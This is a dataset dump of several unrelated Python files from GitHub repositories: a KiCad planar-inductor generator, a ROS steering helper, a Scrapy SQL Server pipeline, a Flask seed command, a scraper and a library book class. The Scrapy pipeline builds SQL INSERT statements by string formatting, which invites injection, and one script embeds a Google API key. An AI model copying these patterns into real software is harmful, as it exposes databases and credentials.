s) + trackWidth / 2\n pad = ' (pad {} thru_hole rect (at {:.3f} {:.3f})(size {} {}) (drill 0.3)(layers *.Cu))\\n'\n footprint += pad.format(1, p + via_size / 2, y[0] - via_size / 2, via_size, via_size)\n footprint += pad.format(2, q - via_size / 2 + trackWidth / 2, -q + trackWidth / 2 + via_size / 4,\n via_size, via_size)\n line_txt = ' (fp_line (start {:.3f} {:.3f}) (end {:.3f} {:.3f}) (layer F.CrtYd) (width 0.12))\\n'\n q = (2 * n * trackWidth + 2 * (n - 1) * s + din) / 2 + s + via_size # basis for corner coordinates\n footprint += line_txt.format(-q, -q, q, -q)\n footprint += line_txt.format(q, -q, q, q)\n footprint += line_txt.format(q, q, -q, q)\n footprint += line_txt.format(-q, q, -q, -q)\n line_txt = ' (fp_line (start {:.3f} {:.3f}) (end {:.3f} {:.3f}) (layer F.SilkS) (width 0.12))\\n'\n footprint += line_txt.format(-q, -q, q, -q)\n footprint += line_txt.format(q, -q, q, q)\n footprint += line_txt.format(q, q, -q, q)\n footprint += line_txt.format(-q, q, -q, -q)\n footprint += \\\n '(fp_text user \"din={:.3f} dout={:.3f} n={} w={:.3f} s={:.3f} L={}H rho={:.3f}\" (at 0 {})(layer Cmts.User) (effects(font(size 1 1)(thickness 0.15))))\\n'.format(\n self.din,\n self.dout,\n self.n,\n self.w,\n self.s,\n EngNumber(self.inductance, precision=3),\n self.rho,\n q + 1)\n footprint += \")\\n\"\n\n return footprint\n\n def calculateInductance(self):\n a = [1.62e-3, -1.21, -0.147, 2.40, 1.78, -0.030] # values from Table III of paper.\n b = a[0]\n\n din = self.din * 1000\n dout = self.dout * 1000\n davg = np.divide((dout + din), 2)\n w = self.w * 1000\n n = self.n\n s = self.s * 1000\n # Monomial Expression\n lmon = np.multiply(b, np.power(dout, a[1]))\n lmon = np.multiply(lmon, np.power(w, a[2]))\n lmon = np.multiply(lmon, np.power(davg, a[3]))\n lmon = np.multiply(lmon, np.power(n, a[4]))\n lmon = np.multiply(lmon, np.power(s, a[5]))\n\n # Modified Wheeler\n k1 = 2.34\n k2 = 2.75\n rho = self.rho\n u = 4e-7 * np.pi\n lmw = np.multiply(u, np.power(n, 2))\n lmw = np.multiply(lmw, k1)\n lmw = np.multiply(lmw, davg)\n lmw = np.divide(lmw, (1 + np.multiply(k2, rho)))\n lmw = np.multiply(lmw, 1e3)\n\n # current sheet\n c1 = 1.27\n c2 = 2.07\n c3 = 0.18\n c4 = 0.13\n lgmd = np.multiply(u, np.power(n, 2)) # u*n^2\n lgmd = np.multiply(lgmd, davg) # u*n^2*davg\n lgmd = np.multiply(lgmd, c1) # u*n^2*davg*c1\n lgmd = np.divide(lgmd, 2) # u*n^2*davg*c1/2\n lgmd = np.multiply(lgmd, np.log(np.divide(c2, rho)) + np.multiply(c3, rho) + np.multiply(c4, np.power(rho, 2)))\n lgmd = np.multiply(lgmd, 1e3)\n\n return np.multiply(lmw, 1e-09), np.multiply(lgmd, 1e-09), np.multiply(lmon, 1e-09)\n\n def parseCommandLineArgs(self):\n\n tag = textwrap.dedent( \\\n \"\"\"\n {}{}\n \"\"\").format(\"\\\\\\\\\", \"\\\\\")\n\n examples = textwrap.dedent( \\\n \"\"\"\n examples:\n %(prog)s -N {0:>2} -Ai {4} -s {8} -g {9} -t {10}\n %(prog)s -N {1:>2} -Ai {5} -s {8} -g {9} -t {10}\n %(prog)s -N {2:>2} -Ai {6} -s {8} -g {9} -t {10}\n %(prog)s -N {3:>2} -Ai {7} -s {8} -g {9} -t {10}\n \"\"\".format(2, 5, 10, 15, 47.2, 38.8, 24.8, 10.8, 0.7, 0.7, 0.035))\n\n parser = argparse.ArgumentParser(description='KiCad PCB Footprint Utility.', \\\n epilog=examples, \\\n formatter_class=RawTextHelpFormatter)\n group_2 = parser.add_argument_group('Optimization')\n group_1 = parser.add_argument_group('Coil parameters')\n\n group_1.add_argument('-n', '--number_of_turns', help=u'number of turns or windings, n \\u2265 1', type=int,\n default=1, action='store', dest='n'),\n group_1.add_argument('-din', '--inside_dimension', help='internal 
dimension, mm', default=0.856, type=float,\n action='store',\n dest='din')\n group_1.add_argument('-w', '--trace_width', help='conductor width, mm', default=0.128, type=float,\n action='store', dest='w')\n group_1.add_argument('-s', '--trace_spacing', help='spacing between windings, mm', default=0.128, type=float,\n action='store',\n dest='s')\n group_1.add_argument('-t', '--trace_height', help='trace thickness or height, mm', default=0.035, type=float,\n action='store',\n dest='t')\n group_1.add_argument('-v', '--verbosity', dest='v', help='output additional results', action='store_true')\n group_1.add_argument('-f', '--footprint', dest='f', help='save kicad pcb footprint', action='store_true')\n group_2.add_argument('-o', '--optimize', help='optimize coil parameters to give the required inductance',\n default=0, type=float, action='store', dest='o')\n args = vars(parser.parse_args())\n\n self.n = args['n']\n self.din = args['din']\n self.s = args['s']\n self.w = args['w']\n self.h = args['t']\n self.o = args['o']\n self.f = args['f']\n self.v = args['v']\n\n if self.n < 1:\n print('The number of turns has to be greater than or equal to 1.')\n sys.exit(-1)\n\n if self.w < 0.128:\n print('The track width has to be greater than or equal to 0.128mm or 5mil.')\n sys.exit(-1)\n\n if self.s < 0.128:\n print('The track spacing has to be greater than or equal to 0.128mm or 5mil.')\n sys.exit(-1)\n\n if self.din < 2 * self.s + self.via_size_x:\n print(\n 'The inner dimension of the coil must be greater than {:.3f} mm.'.format(2 * self.s + self.via_size_x))\n sys.exit(-1)\n\n self.N = 4 * self.n + 1 # number of sides\n self.dout = self.din + 2 * (self.n * self.w + (self.n - 1) * self.s)\n self.rho = (self.dout - self.din) / (self.dout + self.din)\n if self.v:\n print(tag)\n print('dout = {}'.format(EngNumber(self.dout, precision=3)))\n print('n={}'.format(args['n']))\n print('din={}'.format(args['din']))\n print('s={}'.format(args['s']))\n print('w={}'.format(args['w']))\n print('t={}'.format(args['t']))\n print('rho={:.4f}'.format(self.rho))\n\n def generateFasthenryInputFile(self, start_x, start_y):\n\n n = self.n * 4 + 1\n w = self.w\n h = self.h\n nwinc = self.nwinc\n nhinc = self.nhinc\n\n fasthenry = ''\n title = '** Planar Inductor **\\n'\n fasthenry += title\n units = '* The following line names millimeters as the length units for the rest\\n'\n units += '* of the file.\\n'\n units += '.Units MM\\n\\n'\n fasthenry += units\n defaults = ''\n defaults += '* Make z=0 the default z coordinate and copper the default conductivity.\\n'\n defaults += '* Note that the conductivity is in units of 1/(mm*Ohms), and not 1/(m*Ohms)\\n'\n defaults += '* since the default units are millimetres\\n'\n defaults += '.Default z=0 sigma=5.9595e4\\n\\n'\n fasthenry += defaults\n\n nodes = ''\n nodes += '* The nodes of the planar inductor (z=0 is the default)\\n'\n nodeCoordinates_x = []\n nodeCoordinates_y = []\n for i in range(len(start_x)):\n nodeCoordinates_x.append('{}'.format(start_x[i]))\n nodeCoordinates_y.append('{}'.format(start_y[i]))\n nodeCoordinates_x.append('{}'.format(start_x[-1]))\n nodeCoordinates_y.append('{}'.format(-1 * start_y[-1]))\n\n for node in range(len(nodeCoordinates_x)):\n nodes += '{:10} x={:10} y={:10}\\n'.format('N' + str(node + 1), nodeCoordinates_x[node],\n nodeCoordinates_y[node])\n\n nodes += '\\n\\n* The segments connecting the nodes\\n'\n for node in range(n - 1):\n nodes += 'E{0} N{0} N{1} w={2} h={3} nhinc={4} nwinc={5}\\n'.format(node + 1, node + 2, w, h, nhinc, nwinc)\n 
nodes += '\\n* Define one input \\'port\\' of the network\\n'\n nodes += '.external N{} N{}\\n'.format(1, n)\n nodes += '\\n* Frequency range of interest\\n'\n nodes += '.freq fmin=200000 fmax=200000 ndec=1\\n\\n'\n nodes += '.end\\n'\n\n fasthenry += nodes\n\n filename = \"planar_inductor.inp\"\n f = open(filename, \"w+\")\n f.write(fasthenry)\n f.close()\n\n return fasthenry\n\n def nodes2XAndY(self, nodes):\n x = []\n y = []\n for node in nodes:\n x.append(np.round(node.x, 3))\n y.append(np.round(node.y, 3))\n return x, y\n\n def determineImpedanceOfSquarePlanarInductorUsingFasthenry(self):\n nodes = self.getStartEndCoords()\n x, y = self.nodes2XAndY(nodes)\n self.generateFasthenryInputFile(x, y)\n inp = \"planar_inductor.inp\"\n if os.path.exists(inp):\n logfile = 'logfile.txt'\n output_to_logfile = open(logfile, 'w+')\n if os.path.exists('Zc.mat'):\n os.remove('Zc.mat')\n p = Popen([\"fasthenry\", inp], stdout=output_to_logfile, stderr=subprocess.PIPE, universal_newlines=True)\n p.wait()\n\n if os.path.exists('Zc.mat'):\n lines = []\n f = open('Zc.mat', 'r')\n for line in f:\n lines.append(line)\n f.close()\n z = lines[-1].split()\n z = complex(float(z[0]), float(z[1][:-1]))\n self.inductance = z.imag / (2 * math.pi * 200000)\n if self.v:\n print('Zc.mat successfully created.')\n print('real part of impedance = {}'.format(z.real))\n print('imag part of impedance = {}'.format(z.imag))\n print('Fasthenry determined Inductance of the planar inductor to be: {}H'.format(\n EngNumber(self.inductance, precision=3)))\n else:\n print(self.inductance)\n else:\n print('Zc.mat NOT generated!')\n sys.exit()\n else:\n print(\"The file 'planar_inductor.inp' the input file to Fasthenry doesn't exist!\")\n sys.exit()\n\n return self.inductance\n\n def runOptimization(self):\n\n n = 1\n din = 0.856\n w = 0.128\n s = 0.128\n targetInd: float = self.o\n\n def errfunc(x, grad):\n if grad.size > 0:\n grad = None\n self.s = x[0]\n self.w = x[1]\n self.din = x[2]\n self.n = int(x[3])\n self.dout = self.din + 2 * self.n * self.w + 2 * (self.n - 1) * self.s\n self.rho = (self.dout - self.din)/(self.dout + self.din)\n print('\\n=====> s={}'.format(EngNumber(x[0], precision=3)))\n print('=====> w={}'.format(EngNumber(x[1], precision=3)))\n print('=====> din={}'.format(EngNumber(x[2], precision=3)))\n print('=====> n={}'.format(EngNumber(x[3], precision=3)))\n print('=====> dout={}'.format(self.dout))\n print('=====> rho={:.4f}'.format(self.rho))\n\n ind = self.determineImpedanceOfSquarePlanarInductorUsingFasthenry()\n print('=====> ind={}'.format(ind))\n self.L = ind\n err = math.fabs(ind - targetInd)\n return err\n\n def din_constraint(x,grad):\n if grad.size > 0:\n grad = None\n s = x[0]\n din = x[2]\n return 2*s + 0.6 - din\n\n def rho_constraint(x,grad):\n if grad.size > 0:\n grad = None\n s = x[0]\n w = x[1]\n din = x[2]\n n = int(x[3])\n dout = din + 2 * n * w + 2 * (n - 1) * s\n rho = (dout - din)/(dout + din)\n return 0.9 - rho\n\n\n opt = nlopt.opt(nlopt.LN_COBYLA, 4) # opt = nlopt.opt(algorithm, n), (n, the number of optimization parameters)\n s_min = 0.128\n w_min = 0.128\n din_min = 0.856\n n_min = 1\n\n opt.set_min_objective(errfunc)\n opt.add_inequality_constraint(lambda x, grad: din_constraint(x, grad), 1e-8)\n opt.add_inequality_constraint(lambda x, grad: rho_constraint(x, grad), 1e-8)\n opt.set_lower_bounds([s_min, w_min, din_min, n_min])\n opt.set_upper_bounds([ 1, 1, 40, 100])\n opt.set_xtol_rel(1e-6)\n x = opt.optimize([s, w, din, n])\n \n minf = opt.last_optimum_value()\n print(\"optimum at 
\", x[0])\n print(\"minimum value = \", minf)\n print(\"result code = \", opt.last_optimize_result())\n print('\\nOptimized values for an inductor with impedance {}H are:'.format(EngNumber(self.L, precision=3)))\n print('** s={}'.format(EngNumber(self.s, precision=0)))\n print('** w={}'.format(EngNumber(self.w, precision=0)))\n print('** din={}'.format(EngNumber(self.din, precision=3)))\n print('** n={}'.format(EngNumber(self.n, precision=0)))\n print('** dout={}'.format(EngNumber(self.din + 2 * self.n * self.w + 2 * (self.n - 1) * self.s, precision=3)))\n print('** rho={:.4f}'.format(self.rho))\n self.formKiCadFootprint()\n return x[0]\n\n\ndef main(args):\n sk = Scikic()\n lmw, lgmd, lmon = sk.calculateInductance()\n if sk.v:\n print(\n 'lmw = {}H, lgmd={}H. lmon={}H'.format(EngNumber(lmw, precision=3), EngNumber(lgmd, precision=3),\n EngNumber(lmon, precision=3)))\n sk.determineImpedanceOfSquarePlanarInductorUsingFasthenry()\n footprint = sk.formKiCadFootprint()\n if sk.o:\n sk.runOptimization()\n if sk.f:\n filename = 'planar_inductor_{:.3f}_{:.3f}_{:.3f}_{}.kicad_mod'.format(sk.din, sk.w, sk.s, sk.n)\n f = open(filename, 'w+')\n f.write(footprint)\n f.close()\n if sk.v:\n print('Footprint saved to file {}'.format(filename))\n return 0\n\n\nif __name__ == '__main__':\n import sys\n import textwrap\n from engineering_notation import EngNumber\n import argparse\n from argparse import RawTextHelpFormatter\n import os\n import math\n import subprocess\n from subprocess import Popen, PIPE\n import par\n import numpy as np\n import scipy.optimize as optimize\n import minizinc\n\n useNLopt = True\n try: # check if nlopt is available\n import nlopt\n except ImportError:\n print(\"nlopt not unavailable!\")\n useNLopt = False\n\n sys.exit(main(sys.argv))\n","repo_name":"quaffle51/scikic","sub_path":"scikic.py","file_name":"scikic.py","file_ext":"py","file_size_in_byte":19639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39902821099","text":"\"\"\"\n Usage:\n target_angle_listener = TargetAngleListener()\n target_angle_listener.start()\n\n actual_angle_listener = AngleSensorListener()\n actual_angle_listener.start()\n\n actual_angle = actual_angle_listener.get_latest_actual_angle()\n target_angle = target_angle_listener.get_latest_target_angle()\n\n Parameters:\n wheel_base - double, distance between the wheels of the model.\n\n\"\"\"\nimport rospy\nfrom math import atan, pi\n\nfrom roboy_middleware_msgs.msg import MotorCommand, MotorAngle, MotorConfig\nfrom roboy_middleware_msgs.srv import MotorConfigService\nfrom geometry_msgs.msg import Twist\n\nMOTOR_CONTROL_POSITION = 0\nMOTOR_CONTROL_VELOCITY = 1\nMOTOR_CONTROL_DISPLACEMENT = 2\n\n\ndef rad_to_deg(val):\n return val / pi * 180\n\n\ndef deg_to_rad(val):\n return val / 180 * pi\n\n\n# Taken from http://docs.ros.org/kinetic/api/teb_local_planner/html/cmd__vel__to__ackermann__drive_8py_source.html\ndef convert_trans_rot_vel_to_steering_angle(lin_vel, ang_vel, wheelbase):\n if ang_vel == 0 or lin_vel == 0:\n return 0\n\n radius = lin_vel / ang_vel\n return atan(wheelbase / radius)\n\n\nclass TargetAngleListener:\n\n def __init__(self):\n self.target_angle = 0\n\n def start(self):\n self.wheel_base = rospy.get_param('~wheel_base')\n self.listen_to_navigation_controller()\n\n def listen_to_navigation_controller(self):\n def navigation_commands_receiver(twist):\n angular_velocity = twist.angular.z\n linear_velocity = 1.0\n self.target_angle = convert_trans_rot_vel_to_steering_angle(\n 
linear_velocity, angular_velocity, self.wheel_base\n )\n\n rospy.Subscriber('/cmd_vel', Twist, navigation_commands_receiver)\n\n def get_latest_target_angle(self):\n return self.target_angle\n\n\nclass AngleSensorListener:\n\n def __init__(self, zero_angle_raw=2450, decay=0.95, threshold=0.1 / 180 * pi):\n \"\"\"\n :param zero_angle_raw: sensor value corresponding to zero steering angle.\n :param decay: smooth_angle is computed as\n angle = decay*angle + (1-decay)*new_angle\n :param threshold: smooth_angle is updated if difference between the new\n and the last value is larger than the provided\n threshold.\n\n \"\"\"\n self.actual_angle = 0\n self.smooth_angle = 0\n self.last_smooth_angle = 0\n self.decay = decay\n self.threshold = threshold\n self.zero_angle_raw = zero_angle_raw\n\n def start(self):\n self.listen_to_angle_sensor()\n\n def listen_to_angle_sensor(self):\n def angle_receiver(raw_angle):\n if len(raw_angle.raw_angles) != 1:\n rospy.logerr('Invalid motor_angle command received')\n angle = float(\n raw_angle.raw_angles[0] - self.zero_angle_raw) \\\n / 4096 * 2 * pi\n self.actual_angle = angle\n self.smooth_angle = self.smooth_out(angle)\n if abs(self.smooth_angle - self.last_smooth_angle) > self.threshold:\n self.last_smooth_angle = self.smooth_angle\n\n rospy.Subscriber('/roboy/middleware/StearingAngle', MotorAngle,\n angle_receiver)\n\n def get_latest_actual_angle(self):\n \"\"\"\n Last known steering angle, not processed.\n \"\"\"\n return self.actual_angle\n\n def get_latest_smooth_angle(self):\n \"\"\"\n Last known steering angle.\n Smoothed using the exponential smoothing\n https://en.wikipedia.org/wiki/Exponential_smoothing\n to filter out the noise.\n \"\"\"\n return self.last_smooth_angle\n\n def smooth_out(self, angle):\n return self.decay * self.smooth_angle + (1 - self.decay) * angle\n\n\nclass MyoMuscleController:\n\n def __init__(self, fpga_id, left_motor_id, right_motor_id, init_disp=10):\n self.fpga_id = fpga_id\n self.left_motor_id = left_motor_id\n self.right_motor_id = right_motor_id\n self.init_disp = init_disp\n\n def start(self):\n self.publisher = rospy.Publisher('/roboy/middleware/MotorCommand',\n MotorCommand,\n queue_size=1)\n rospy.logwarn('CAREFUL! 
Myo-muscle controller is activated, '\n                      'rickshaw will start turning if cmd_vel command is set.')\n        self.set_control_mode()\n\n    def set_control_mode(self):\n        config_motors_service = rospy.ServiceProxy(\n            '/roboy/unknown/middleware/MotorConfig',\n            MotorConfigService\n        )\n        config = MotorConfig(\n            id=self.fpga_id,\n            motors=[self.left_motor_id, self.right_motor_id],\n            control_mode=[MOTOR_CONTROL_DISPLACEMENT, MOTOR_CONTROL_DISPLACEMENT],\n            output_pos_max=[1000, 1000],\n            output_neg_max=[-1000, -1000],\n            sp_pos_max=[1000000, 1000000],\n            sp_neg_max=[-1000000, -1000000],\n            integral_pos_max=[1000, 1000],\n            integral_neg_max=[-1000, -1000],\n            kp=[200, 200],\n            ki=[0, 0],\n            kd=[0, 0],\n            forward_gain=[0, 0],\n            dead_band=[0, 0],\n            output_divider=[1, 1],\n            setpoint=[self.init_disp, self.init_disp]\n        )\n        config_motors_service(config)\n\n    def send_command(self, effort_left, effort_right):\n        command = MotorCommand()\n        command.id = self.fpga_id\n        command.motors = [self.left_motor_id, self.right_motor_id]\n        command.set_points = [effort_left, effort_right]\n        self.publisher.publish(command)\n","repo_name":"Roboy/autonomous_driving_src","sub_path":"roboy_navigation/src/roboy_navigation/steering_helper.py","file_name":"steering_helper.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8758948045","text":"if __name__ == \"__main__\":\n    # split the data\n    # load the data\n    from sklearn.datasets import load_iris\n    import pandas as pd\n    from binning_woe.binning.sklearn_bin import NumtoCategorical as nc\n    from binning_woe.sklearn_woe import CattoWoe\n    iris = load_iris()\n    df=pd.concat([pd.DataFrame(iris.data),pd.DataFrame(iris.target)],ignore_index=True,axis=1)\n    df.columns=iris.feature_names+['target']\n    df=df[df['target'].isin([1,2])]\n    # split the data\n    Sp=nc(bins_num=3,num_cols=iris.feature_names)\n    clf=Sp.fit(df,'target',split_func='chi')\n    dff=clf.transform()\n\n    Cw=CattoWoe('target')\n    wclf=Cw.fit(dff)\n    wdf=wclf.transform()\n    print(wdf.head())\n\n    from sklearn.linear_model import LogisticRegression\n    from sklearn.model_selection import train_test_split\n    from sklearn.metrics import classification_report\n    cols=list(filter(lambda item:item !='target',wdf.columns))\n    X,x_test,Y,y_test=train_test_split(wdf[cols],wdf['target'],test_size=0.33,shuffle=True)\n    clf = LogisticRegression()\n    clf.fit(X, Y)\n    score_test = classification_report(y_test, clf.predict(x_test))\n    print(score_test)\n    X,x_test,Y,y_test=train_test_split(df[cols],df['target'],test_size=0.33,shuffle=True)\n    clf = LogisticRegression()\n    clf.fit(X, Y)\n    score_test = classification_report(y_test, clf.predict(x_test))\n    print(score_test)","repo_name":"lphcreat/binning-and-woe","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14403837659","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\n\nimport pyodbc\n#import datetime\n#from datetime import date, timedelta\nfrom twisted.enterprise import adbapi\nimport re\nimport os\nimport platform\nimport json\nimport logging\nimport scrapy\nfrom scrapy import crawler\n#from data.states import states\n#from data.status_map import status_map\n#from data.availability_map import avail_map\n#from 
data.update_trigger_fields import update_fields\nfrom .items import AgentsItem\nfrom .items import AgenciesItem\n\n\n#from itemadapter import ItemAdapter\n\n\nclass AgencylistingscommercialPipeline:\n\n\n \n table_name = \"\"\n \n connection = ''\n\n spider = {}\n\n def __init__(self):\n pass\n\n\n async def process_item(self, item, spider):\n\n\n \n if isinstance(item, AgenciesItem):\n \n await spider.connection.runQuery(self.insert_query_agency(item))\n\n elif isinstance(item, AgentsItem):\n \n await spider.connection.runQuery(self.insert_query_agent(item))\n\n\n return item\n\n\n\n def insert_query_agency(self, item):\n try:\n query = \"\"\"BEGIN SET NOCOUNT ON; INSERT INTO AgenciesCommercial VALUES (\n '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}', '{}'\n ); SELECT 0; END\"\"\".format(\n \n item['name'], item['url'], item['agent_count'], item['market_count'],\n item['brisbane_council_markets'], item['brisbane_council_markets_percent'], item['state'], item['markets'], item['source'], item['sale_type'], \n )\n \n return query\n except Exception as e:\n logging.error(\"Error In insert query building\")\n #logging.error(item['listing_web_address'])\n logging.error(e, exc_info=True)\n\n\n\n\n def insert_query_agent(self, item):\n try:\n query = \"\"\"BEGIN SET NOCOUNT ON; INSERT INTO Agents VALUES (\n '{}', '{}', '{}', '{}', '{}', '{}'\n ); SELECT 0; END\"\"\".format(\n \n item['url'], item['first_name'], item['last_name'], item['mobile_number'], item['email'],\n item['agency_url'], \n )\n\n\n return query\n except Exception as e:\n logging.error(\"Error In insert query building\")\n #logging.error(item['listing_web_address'])\n logging.error(e, exc_info=True)\n\n\n\n\n def open_spider(self, spider):\n #self.start_time = datetime.datetime.now()\n\n print(\"Detecting drivers to connect with database...\")\n drivers = [item for item in pyodbc.drivers()]\n # print(\"Driver List: \")\n # print(drivers)\n\n # print(\"Selected driver for connection:\")\n driver = drivers[-1]\n # print(driver)\n\n print(\"Connecting to database...\", spider.settings.get('SERVER'), spider.settings.get('DATABASE'), \"1433\")\n try:\n # Connection string for freetds lib\n self.connection = adbapi.ConnectionPool(\n \"pyodbc\",\n driver=driver,\n TDS_Version='8.0',\n server=spider.settings.get('SERVER'),\n port=1433,\n database=spider.settings.get('DATABASE'),\n uid=spider.settings.get('USERNAME'),\n pwd=spider.settings.get('PASSWORD'),\n autocommit=True\n )\n\n spider.connection = self.connection\n\n # setting spider attaching getSuburbs method to spider to fetch suburbs from database\n self.spider = spider\n #spider.getSuburbs = self.getSuburbs\n #spider.predictItemPropertyType = self.predictItemPropertyType\n self.table_name = spider.settings.get('LISTING_TABLE')\n\n # Connection string for msodbcsql lib\n # self.dbpool = adbapi.ConnectionPool(\"pyodbc\", \"Driver={\"+driver+\"};Server=tcp:server-remap-io.database.windows.net,1433;Database=db-remap.io;Uid=\"+username+\";Pwd=\"+password+\";Encrypt=yes;TrustServerCertificate=no;Connection Timeout=30;\", autocommit=True)\n # self.dbpool.runQuery(\"Select top (1) * from Scraped_data;\").addCallback(self.printResult)\n\n print(\"Connected to database...\")\n\n # calculating day for full or limited scrapes\n #print(\"========== > Calculated Day: \" + str(self.day_of_week_number) + \" ( \" + self.day_of_week_name + \" ) \")\n spider.stop = False\n except Exception as e:\n print(\"=================== Connection to database failed ===================\")\n 
print(e)\n","repo_name":"priosuwanto/agencylistingscommercial","sub_path":"agencylistingscommercial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2928795376","text":"from main import db\nfrom flask import Blueprint\n\ndb_commands = Blueprint(\"db-custom\", __name__)\n\n@db_commands.cli.command(\"create\")\ndef create_db():\n    db.create_all()\n    print(\"Tables created!\")\n\n@db_commands.cli.command(\"drop\")\ndef drop_db():\n    db.drop_all()\n    db.engine.execute(\"DROP TABLE IF EXISTS alembic_version;\")\n    print(\"Tables deleted\")\n\n@db_commands.cli.command(\"seed\")\ndef seed_db():\n    from models.Animal import Animal\n    from models.Shelter import Shelter\n    import random\n\n    shelters = []\n\n    for i in range(5):\n        shelter = Shelter()\n        shelter.name = f\"Shelter {i}\"\n        shelter.email = f\"test{i}@email.com\"\n        shelter.phone = \"000000000\"\n        shelter.address = f\"{i} Bilbi Street\"\n        shelter.city = f\"Shelter City {i}\"\n        db.session.add(shelter)\n        shelters.append(shelter)\n\n    db.session.commit()\n\n    for i in range(15):\n        animal = Animal()\n        animal.name = f\"Animal{i}\"\n        animal.kind = f\"Kind{i}\"\n        animal.breed = f\"Breed{i}\"\n        animal.age = f\"{i + 13} weeks\"\n        animal.shelter_id = random.choice(shelters).id\n        db.session.add(animal)\n    \n    db.session.commit()\n    print(\"Tables seeded\")","repo_name":"rheal3/Animals-Shelters","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6378303422","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct  6 13:36:13 2017\n\n@author: jean-marcsevin\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'https://www.insee.fr/fr/statistiques/1906659'\n\ndef get_soup(url):\n    r = requests.get(url)\n    soup = BeautifulSoup(r.text, 'html.parser')\n    return soup\n\ndef clean_commune(item):\n    return str(item).replace(\"<th>\",\"\").replace(\"</th>\",\"\")\n\ndef calc_distance(origin, destination):\n    r = requests.get(\"https://maps.googleapis.com/maps/api/distancematrix/json?origins=\" + origin + \"&destinations=\" + destination + \"&language=fr-FR&key=AIzaSyDhnRwPrt4EQqiQg3Q-hNcAXsk0Iy5qCcg\")\n    return r.json()['rows'][0]['elements'][0]['distance']['text']\n\nsoup = get_soup(url)\n\ncommunes_raw = soup.find('table', attrs={\"id\": \"produit-tableau-T16F014T4\"}).find('tbody').find_all('th')[1::2]\ncommunes = [clean_commune(item) for item in communes_raw]\n\nnb_Communes = len(communes)\n\ndf = pd.DataFrame(index=communes, columns=communes)\n\n# Missing: the routine to build the matrix and export it as CSV ","repo_name":"MS-BGD-2018-KIT-BIGDATA/JeanMarc_SEVIN","sub_path":"Lesson3/exo_cc_lesson_03.py","file_name":"exo_cc_lesson_03.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10628374308","text":"import json\nimport BookItem\nimport LoanItem\nimport csv\nCURRENTUSER = 0\n\n\nclass Book():\n    \"\"\"This is a book class\"\"\"\n\n    def __init__(self, author, country, imageLink, language, link, pages, title, isbn,\n                 year):\n        self.author = author\n        self.country = country\n        self.imageLink = imageLink\n        self.language = language\n        self.link = link\n        self.pages = pages\n        self.ISBN = isbn\n        self.title = title\n        self.year = 
year\n\n def __repr__(self):\n return self.author + \", \" + self.country + \", \" + self.imageLink + \", \" + self.language + \", \" + str(\n self.link) + \", \" + str(self.pages) + \", \" + self.title + \", \" + str(self.ISBN) + \", \" + str(self.year) + \"\\n\"\n\n def writeToDatabase(self):\n with open('BookDatabase.json') as json_file:\n data = json.load(json_file)\n\n book_data = {\n \"author\": self.author,\n \"country\": self.country,\n \"imageLink\": self.imageLink,\n \"language\": self.language,\n \"link\": self.link,\n \"pages\": self.pages,\n \"title\": self.title,\n \"ISBN\": self.ISBN,\n \"year\": self.year\n }\n data.append(book_data)\n with open(\"BookDatabase.json\", 'w', ) as f:\n json.dump(data, f, indent=4)\n\n def showBook(self, CURRENTUSER):\n print(\"[Book] Author: \" + self.author)\n print(\"[Book] Country: \" + self.country)\n print(\"[Book] Image Link: \" + self.imageLink)\n print(\"[Book] Language: \" + self.language)\n print(\"[Book] Link: \" + self.link)\n print(\"[Book] ISBN: \" + str(self.ISBN))\n print(\"[Book] Pages: \" + str(self.pages))\n print(\"[Book] Title: \" + self.title)\n print(\"[Book] Year: \" + str(self.year))\n a = LoanItem.LoanItem(\"none\", \"none\", \"none\")\n if a.loanAvailabilityCheck(self.findISBN(), self.author, self.title):\n while True:\n print(\"[Book]\")\n userInput = input(\"[Book] Would you like loan this book (y/n): \")\n if userInput == \"y\":\n if LoanItem.LoanItem.limitCheck(CURRENTUSER) == False:\n print(\"user already has 3 books\")\n break\n loanItem = LoanItem.LoanItem(CURRENTUSER, 30, self.findISBN())\n loanItem.writeToDatabase()\n print(\"[Book] Loan successfully administrated.\")\n print(\"[Book]\")\n break\n if userInput == \"n\":\n return\n print(\"[Book] Invalid input, please try again. 
\")\n else:\n input(\"[Book] No book available, press any key to go back!\")\n\n def findISBN(self):\n\n bookItemList = []\n\n with open(\"BookItemDatabase.csv\", mode='r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n\n for r in csv_reader:\n bookItemList.append(BookItem.BookItem(r[0], r[1], r[2], r[3]))\n for bookItem in bookItemList:\n if bookItem.author == self.author and bookItem.title == self.title:\n return bookItem.ISBN\n\n def deleteBook(self):\n new_list = []\n with open(\"BookDatabase.json\", mode='r', newline='') as read_file:\n tmp = json.load(read_file)\n for r in tmp:\n if self.ISBN == r['ISBN']:\n print(\"skip\")\n else:\n new_list.append(r)\n print(r.__repr__())\n print(new_list)\n with open(\"BookDatabase.json\", mode='w', newline='') as read_file:\n json.dump(new_list, read_file, indent=4)\n\n def editBook(self):\n new_list = []\n with open(\"BookDatabase.json\", mode='r', newline='') as read_file:\n tmp = json.load(read_file)\n for r in tmp:\n if r['ISBN'] == self.ISBN:\n r[\"author\"] = input(\"new author \")\n r[\"country\"] = input(\"new country \")\n r[\"imageLink\"] = input(\"new imageLink \")\n r[\"language\"] = input(\"new language\")\n 